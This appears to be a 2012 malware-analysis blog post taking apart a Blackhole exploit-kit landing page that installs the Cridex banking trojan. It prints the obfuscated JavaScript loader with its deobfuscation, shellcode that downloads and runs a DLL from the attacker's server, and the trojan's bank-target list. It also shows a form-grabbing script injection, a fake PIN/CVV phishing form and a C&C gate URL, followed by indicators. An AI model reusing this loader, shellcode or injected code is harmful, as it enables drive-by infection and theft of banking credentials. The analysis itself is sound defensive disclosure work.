h00p://aviaonlolsio.ru:8080/forum/links/column.php
Ignoring the HTML code, that landing page fuzzy code's structure is as per below:
//----------------------structure-------------------

// jar applet part.....
<applet archive="/forum/links/column.php?fubzjr=dgfxdx&vxsk=eauuz" code="hw">
<param name="val" value="Dyy3OjjVv8"/>
<param name="prime" value="Vto-t-i8twlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xt.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tR0b6.RSUbARMUb3" />
</applet>
<div></div>

// first part of the script...
dd="i";
if(document.getElementsByTagName("div")[0].style.left==="")
    {ss=String.fromCharCode;}
pp="eIn";

// scattered deobfs'd data under tag <i> from var 0,1,..,29
<i 
  0="-0kjh4k3-05ke5j2..."
  1=
  :
  :
 29="-7i1kjhk-9k3g38f..."
>

// second part of the script....
if(document.getElementsByTagName("d"+"iv")[0].style.left===""){a=document["getElementsB"+"yTagName"](dd);
a=a[0];
s=new String();
for(i=0;;i++){
 r=a.getAttribute(i);
 if(r){s=s+r;}else break;}
a=s;
s=new String();
e=window["eva"+"l"];
p=parseInt;
for(i=0;a.length>i;i+=2){
 if(a.substr(i,1)=="-")i+=2;
 if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));}
c=s;
e(c)}  
//-----------------------end of structure----------
Remember to always make things simple :-) Start joining the scattered/deobfs'ed vars...
 dd="i";
 pp="eIn";
 if(document.getElementsByTagName("div")[0].style.left==="")
   {
   ss=String.fromCharCode;
   }
 if(document.getElementsByTagName("div")[0].style.left==="")
 {
   a=document["getElementsByTagName"](dd);
   a=a[0];
   s=new String();
   for(i=0;;i++)
   {
     r=a.getAttribute(i);
     if(r)
     {
       s=s+r;
     }
     else break;
   }
   a=s;
   s=new String();
   p=parseInt;
   for(i=0;a.length>i;i+=2)
   {
     if(a.substr(i,1)=="-")i+=2;
     if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));
   }
   c=s;
   eval(c)
 }
And pumped in the i tag values as per it is & runs it in your Rhino or SpiderMonket (Java Engines/Emulator) to get the - Plugin Detect here --->>[PASTEBIN] Straight to the point, let's crack the shellcode parts, see - the function getShellCode() part, and change the function into below - usual drill:
var a = "8200!%8582!%2551!%e0c4!%51f4!%1525!%34e0!%5191!%e054!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%95d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%74e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%14
  :
  :
!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e90!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
x= a["replace"](/\%!/g, "%" + "u");
document.write(x);
↑Run it & your'll get the shellcode after stripping the "%u" strings of the run's result..
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 09 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
          :                       :                    :
58 40 58 17 47 4e 15 1b  18 12 19 46 12 19 41 12  X@X.GN.....F..A.
19 41 12 1b 1b 0e 59 4d  15 1a 5e 12 19 43 12 19  .A....YM..^..C..
45 12 1b 1a 12 1b 1b 12  19 43 12 19 43 12 1b 19  E........C..C...
12 19 42 12 19 47 0e 45  15 19 43 0e 51 52 15 4f  ..B..G.E..C.QR.O
0e 4c 52 15 58 28 28 00                           .LR.X((.
looks like the payload url is not seen if we don't dis-assembly this, so let's dis-assembly it (use many shellcode analyzer tools you prefer)
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=p , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
So we got the payload url here:
h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=p
This time I just runs it in my test PC browser & download & plays with it. To have downloads with the varied names like pics below: *) If you would like to grab it with saver mode see previous posts pls. All of them is actually same files:
about.exe     06c032711f0cfae2c443b3926253b296
contacts.exe  06c032711f0cfae2c443b3926253b296
info.exe      06c032711f0cfae2c443b3926253b296
readme.exe    06c032711f0cfae2c443b3926253b296

A quick binary analysis

Shortly, like usual, is a Cridex, trojan password stealer. Let's see peek the PE info's (not much info though)
$ ls -alF ./sample
-rwx------   1 xxxx xxxx 120320 Dec 14 09:38 ./sample*

// hex
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 08 00 8C 32 CB 50 00 00 00 00    PE..L....2.P....
0090   00 00 00 00 E0 00 0F 03 0B 01 06 09 00 24 00 00    .............$..
00A0   00 60 00 00 00 02 00 00 40 12 00 00 00 10 00 00    .`......@.......
00B0   00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00    .@....@.........
00C0   04 00 00 00 05 00 04 00 04 00 00 00 00 00 00 00    ................
00D0   00 30 02 00 00 04 00 00 12 A2 00 00 02 00 00 00    .0..............
 :                           :                                   :
// disassembly 1st block...
0x401240 mov ebp esp 
0x401241 sub esp 0x8 
0x401243 mov [esp] 0x2 
0x401246 call [0x40912c] 
0x40124d call 0x401100L 
0x401253 nop 
0x401258 lea esi [esi+0x0] 
0x401259 push ebp 
0x401260 mov ecx [0x409164] 
0x401261 mov ebp esp 
0x401267 pop ebp 
0x401269 jmp ecx 
    :     :   :
//PE Analysis:
MD5:       06c032711f0cfae2c443b3926253b296 
SHA-1:       0f129c1e331c3cf08eec5461a3e1d54e7f40932a 
File Size:   120,320 Bytes
Image Base : 0x400000
Entry Point: 0x1000
Sections:
   .text 0x1000 0x238c 9216 < EP
   .data 0x4000 0x10e0 4608
   .rdata 0x6000 0x1920 6656
   .bss 0x8000 0x200 0       
   .idata 0x9000 0x3fc 1024
   .rsrc 0xa000 0xbc4 3072
   DATA 0xb000 0x17000 94208  <==== packed..
   DATA 0x22000 0x1000 512

//Suspicious Points:
CRC Failed: Claimed: 41490 Actual:  181202
Compiled Time: 0x50CB328C [Fri Dec 14 14:07:08 2012 UTC] // freshies! :-))
Packer: MinGW GCC 3.x <==== this mess making hard to read

// loaded DLLs:
ntdll.dl    0x7C900000   0x000AF000 
kernel32.dl 0x7C800000   0x000F6000 
msvcrt.dll  0x77C10000   0x00058000 

// The traces of calls that are "readable":
KERNEL32.dll.AddAtomA Hint[1]
KERNEL32.dll.ExitProcess Hint[155]
KERNEL32.dll.FindAtomA Hint[175]
KERNEL32.dll.GetAtomNameA Hint[220]
KERNEL32.dll.GetModuleHandleA Hint[335]
KERNEL32.dll.SetUnhandledExceptionFilter Hint[735]

So what happened if we run this malware? (summary)

I'll make it short and simple, is a Cridex..
it drops junks to %Temp% (like exp*.tmp) +also %AppData% & self deleted - and then execute CMD to exec %AppData%\KB00085031.exe" (after being self-copied/dropped)
These processes was kicked off by KB00085031.exe
ctfmon.exe // with code injection into other processes
svchost.exe

Network Analysis

For the network traffic, it does exactly as per - described in previous post here--->[PrevPost] I'm sorry friends, there's nothing new in it.

(Main Course) How the stolen information grabbed & sent..

I will describe a shocky facts that I frannkly just realized, After being advised by Blake (with thank's!), author of legendary tool Jsunpack, let me try to explain as per below: The incoming data which looks like binary which was encyrpted was - actually decoded by the malware itself and saved it as binary in a registry key <==POINT! In this case the key is at:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\[random]\
And is ahving the value of below strings:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 
34 39 64 63 38 39 66 30 36 38 65 38 63 36 32 65 
35 35 39 33 31 32 65 31 66 63 32 30 33 66 38 39 
62 66 64 39 65 38 38 36 22 3E 3C 68 74 74 70 73 
          : 
       snipped
Copy & paste this code in binary editor you'll get view below: OK, is a TEXT. So let's save it as text file to view it well... Snipped below:
 <settings hash="49dc89f068e8c62e559312e1fc203f89bfd9e886"><httpshots..
/(html|plain)">/bb/logon/</url><url contentType="^text/(html|plain)">.. 
ccm/</url><url contentType="^text/(html|plain)">/cmmain\.cfm</url><ur..
="^text/(html|plain)">/ebc_ebc1961/</url><url contentType="^text/(htm..
entType="^text/(html|plain)">/livewire/</url><url contentType="^text/..
ser/</url><url contentType="^text/(html|plain)">/smallbiz/</url><url.. 
in)">2checkout\.com</url><url contentType="^text/(html|plain)">ablv\...
ain)">accountoverview\.aspx</url><url contentType="^text/(html|plain)..
pe="^text/(html|plain)">achworks\.com</url><url contentType="^text/(h..
com</url><url contentType="^text/(html|plain)">atbonlinebusiness\.com..
">baltikums\.eu</url><url contentType="^text/(html|plain)">banesco\.c..
banking\.firsttennessee\.biz</url><url contentType="^text/(html|plain..
^text/(html|plain)">business\.swedbank\.lv</url><url contentType="^te..
   :             :                        :
You can see the beautiful format of raw one here --->>[PASTEBIN]

What is this?

This is the configuration file of the Trojan stealer itself. In this data was defined well, what to fetch, where to fetch, how to send, where to send, how to fraud, how to encrypt the data, etc. I'll make some example below: It defined https saved data of banking/cashing online sites, & how to- fetch the patch contains the credentials' handle config:
https://(www\.|)cashanalyzer\.com/
https://(www\.|)enternetbank\.com/
https://(www\.|)nashvillecitizensbank\.com/
https://.*citizensbank\.com/
https://.+\.firsttennessee\.com/
https://.*firstcitizens\.com/
https://(bolb\-(west|east)|www)\.associatedbank\.com/
https://.*secure\.fundsxpress\.com/
https://usgateway\d*\.rbs\.com/
https://(www\.|)svbconnect\.com/
https?://(www\d*\.|)(ntrs|northerntrust)\.com/
https://cib\.bankofthewest\.com/
https://.+\.unionbank\.com/
https://webbankingforbusiness\.mandtbank\.com/
https://ifxmanager\.bnymellon\.com/
https://(ecash\.|.+/cashman/)
https://alphabank\.com
https://banking\.calbanktrust\.com/
https://(www\.|)efirstbank\.com/
https://singlepoint\.usbank\.com/
https://business-eb\.ibanking-services\.com/
https://www8\.comerica\.com/
https://.+\.53\.com/
https://businessonline\.tdbank\.com/
https://.+\.jpmorgan\.com/
https://(www\.|)cashanalyzer\.com/
https://business-eb\.ibanking-services\.com/
https://businessonline\.tdbank\.com
https://.+.tdcommercialbanking\.com/
https://chaseonline.chase.com
   :
 (and so many more of this..)
↑following the domain is path of credentials.. Defining domains of other bankig/cash online sites:
business\.swedbank\.lv
myonline\.bankbv\.com
banknet\.lv
bankofcyprus\.com
bankonline\.sboff\.com
bankonline\.umpquabank\.com
bmoharrisprivatebankingonline\.com
   :
   :
  (have about 10more of these...)
↑following by path of credentials.. Or also other sites with credentials....
https://.+/(wcmfd/wcmpw|phcp/servlet)/
https://.+/pub/html/
https://direct.53.com
  :
There is also javascript command to encrypt the credentials, before sent to theese moronz, see below:
 if(typeof window.EncryptPassword=='function')
 {
   var fn=window.EncryptPassword;
   window.EncryptPassword=function(id)
   {
     try
     {
       var e=document.getElementById(id);
       var i=document.createElement("input");
       i.type="hidden";
       i.name="OPN";
       i.value=e.value;
       document.Form1.appendChild(i);
     }
     catch(e)
     {
     }
     return fn(id);
   };
 }
Not only those above, these moronz also faking online banking page to directly fooled you & phish your account credentials too, PoC:
<td class="inputField1" align="right">
 ATM or Debit Card PIN:
 </td>
 <td class="initialtext" style="padding:4px;" >
 <input type="password" class="myinputs" id="acpin" maxlength="12" size="3" name="acpin" />
 </td>
 </tr>
 <tr>
 <td class="inputField1" align="right">
 3- or 4-digits security code:
 </td>
 <td class="initialtext" style="padding:4px;" >
 <input type="password" class="myinputs" id="cvv" maxlength="4" size="3" name="cvv2" />
 </td>
 </tr>
 <tr>
 <td colspan="2">
 <p class="graytext">
 Please be patient as we process your information.</p>
 </td>
 </tr>
 </table>
 </td>
 </tr>
 <tr>
 <td>
 </td>
 <td>
 <!-- BEGIN art_SA_edu_edu_instr.xml -->
 <span class="bodytext">
 Click "Next" to continue Identity verification process.
 </span>
 <!-- END of art_SA_edu_edu_instr in DCTM ECP -->
 </td>
 </tr>
 <tr>
 <td colspan="2">
 </td>
 </tr>
 <tr>
 <td>
 </td>
 <td>
 <span class="bodytext">
 <label title="Go to Enter Card">
 </label>
 </span>
 </td>
 </tr>
 <tr>
   :
etc etc
Also making your PC as botnet. i.e.: there goes my poor test PC info - which was sent to CnC as Bot....
<modify><pattern>
<![CDATA[</html.*?>(.*?)]]></pattern><replacement>
<![CDATA[<script type="text/javascript" 
src="h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase"></script>]]><
/replacement></modify></actions></httpinject>
<httpinject><conditions><url type="deny">\.(css|js)($|\?)</url>
<url type="allow" contentType="^text/(html|plain)">
so, practically your infected PC (like- my test machine, was mentioned as Bot in CnC...) The sent URL format for phishs data are plain text at:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
Indicatingthe CnC data collector in the proxy of
78.159.121.128:8080
via below path/uri
h00p://78.159.121.128:8080/career/ h00p://78.159.121.128:8080/ipckg/gate.php
Gentlemen, Blake tested these path, and I did it too, match to ALL previous latest findings we made. No changes so far. Better to shutdown the 78.159.121.128 soon, which will slowing their movement in infections. And.. Maybe you will find additional other shocky or useful facts? Please share! :-)

Virus Total Detection Ratio

The Payload is... (Wanna bet? Lower than 5 or less?) Here:
SHA1: 0f129c1e331c3cf08eec5461a3e1d54e7f40932a MD5: 06c032711f0cfae2c443b3926253b296 File size: 117.5 KB ( 120320 bytes ) File name: test89237201835362.bin File type: Win32 EXE DetectionRatio: 5 / 46 Analysis date: 2012-12-14 21:10:08 UTC ( 1 時間, 15 分 ago ) URL ---------->>[CLICK] With Interesting Malware Names: TrendMicro-HouseCall : PAK_Generic.001 Sophos : Mal/Zbot-IQ TrendMicro : PAK_Generic.001 Kaspersky : Trojan.Win32.Bublik.wcz Panda : Trj/Genetic.gen
While the landing page is...
(I cannot upload it to VT somehow...

What's the moral of this story?

Firstly, please grep whether your banks are in the list of target list. (Again) See the pastebin here to search-->>[PASTEBIN] Now you maybe understand why we always tweet about this group? Can you imagine how frustrated we are to report this case for 4 month w/o- being followed properly by authority? <==PoC: Spams of these still spotted! This moronz team is sending hundreds spam daily with 50more redirectors & ending up to multi IP address (3 or 4) landing page with PluginDetect BHEK2 payloads of these...

Sample Download

Sorry friends, this time only sample -->>[CLICK]

Some Network Information

Domain: aviaonlolsio.ru
serial  = 2012010101
refresh = 604800 (7 days)
retry   = 1800 (30 mins)
expire  = 1800 (30 mins)
default TTL = 60 (1 min)

aviaonlolsio.ru.  56   IN    A   217.112.40.69
aviaonlolsio.ru.  56   IN    A   91.142.208.144

ns1.aviaonlolsio.ru.    59      IN   A   69.64.89.82
ns2.aviaonlolsio.ru.    3600    IN   A   62.76.189.72 85.143.166.202
ns3.aviaonlolsio.ru.    3600    IN   A   41.168.5.140
ns4.aviaonlolsio.ru.    3600    IN   A   209.51.221.247
ns5.aviaonlolsio.ru.    3600    IN   A   42.121.116.38
ns6.aviaonlolsio.ru.    3600    IN   A   110.164.58.250
ns7.aviaonlolsio.ru.    60      IN   A   209.51.221.247
ns8.aviaonlolsio.ru.    60      IN   A   163.10.12.83
ns9.aviaonlolsio.ru.    60      IN   A   216.99.149.226
ns10.aviaonlolsio.ru.   60      IN   A   208.87.243.196
ns11.aviaonlolsio.ru.   60      IN   A   203.146.208.180
ns12.aviaonlolsio.ru.   60      IN   A   74.117.61.66

registrar:     NAUNET-REG-RIPN
created:       2012.12.07
paid-till:     2013.12.07
free-date:     2014.01.07
source:        TCI
Last updated on 2012.12.15 05:51:35 MSK

// IP Infector history:
pelamutrika.ru   A  91.142.208.144
aliamognoa.ru    A  91.142.208.144
ahiontota.ru     A  91.142.208.144
anifkailood.ru   A  91.142.208.144
podarunoki.ru    A  91.142.208.144
aseniakrol.ru    A  91.142.208.144
publicatorian.ru A  91.142.208.144
pitoniamason.ru  A  91.142.208.144
amnaosogo.ru     A  91.142.208.144
aviaonlolsio.ru  A  91.142.208.144
dimarikanko.ru   A  91.142.208.144
adanagenro.ru    A  91.142.208.144
awoeionfpop.ru   A  91.142.208.144
aofngppahgor.ru  A  91.142.208.144

pelamutrika.ru   A  217.112.40.69
aliamognoa.ru    A  217.112.40.69
podarunoki.ru    A  217.112.40.69
aseniakrol.ru    A  217.112.40.69
pitoniamason.ru  A  217.112.40.69
aviaonlolsio.ru  A  217.112.40.69
adanagenro.ru    A  217.112.40.69
aofngppahgor.ru  A  217.112.40.69

"MalwareMustDie!